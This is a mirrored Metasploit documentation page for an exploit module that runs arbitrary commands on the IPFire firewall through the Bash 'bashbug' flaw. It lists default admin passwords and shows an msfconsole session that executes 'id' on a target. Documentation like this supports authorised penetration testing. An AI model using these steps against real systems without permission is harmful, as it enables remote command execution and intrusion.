infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md

1.2 KiB
Raw Blame History

Vulnerable Application

Official Source: ipfire Archived Copy: github

Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: use exploit/linux/http/ipfire_bashbug_exec
  4. Do: set rhost 10.10.10.10
  5. Do: set PASSWORD admin
  6. Do: set CMD ls
  7. Do: run
  8. You should see the output of the command that was run.

Options

PASSWORD

Password is set at install. May be blank, 'admin', or 'ipfire'.

CMD

This is the command to run on the system.

Scenarios

Example of running the ID command

  msf > use exploit/linux/http/ipfire_bashbug_exec 
  msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
  PASSWORD => admin
  msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
  rhost => 192.168.2.202
  msf exploit(ipfire_bashbug_exec) > set CMD id
  CMD => id
  msf exploit(ipfire_bashbug_exec) > exploit
  
  [+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
  [*] Exploit completed, but no session was created.